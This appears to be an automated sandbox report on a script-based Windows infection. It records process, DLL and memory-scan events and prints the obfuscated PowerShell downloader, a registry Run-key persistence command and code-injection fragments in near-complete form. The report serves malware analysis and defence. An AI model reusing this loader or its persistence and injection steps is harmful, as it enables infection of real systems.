              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rstrtmgr.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: cqm.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb* source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb^R source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kasko", "0")
              Source: Yara match | File source: 00000009.00000002.2618570494.00000000053D8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1737667724.000000000AAA8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1718585876.0000000006142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Quiniretin)$gloBal:CYclIzES = [sysTeM.TeXt.EncOdiNg]::AsCIi.GetsTrINg($sKilteSKriFten)$gLoBAl:slgtsfEjDEn114=$CyCLIzES.sUBStRInG($baNQUetTE,$gYnobAsIc)<#Waxhearted Andedams Echeneida
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Multisync $Henstodjaerges252 $Bemalings), (Uninvestigable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:monologists = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($grnsestationen)), $Tachismes).DefineDynamicModule($Taalmodiges, $false).DefineType($Narkomaner, $cykelrytteres, [System.MulticastDeleg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Quiniretin)$gloBal:CYclIzES = [sysTeM.TeXt.EncOdiNg]::AsCIi.GetsTrINg($sKilteSKriFten)$gLoBAl:slgtsfEjDEn114=$CyCLIzES.sUBStRInG($baNQUetTE,$gYnobAsIc)<#Waxhearted Andedams Echeneida
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
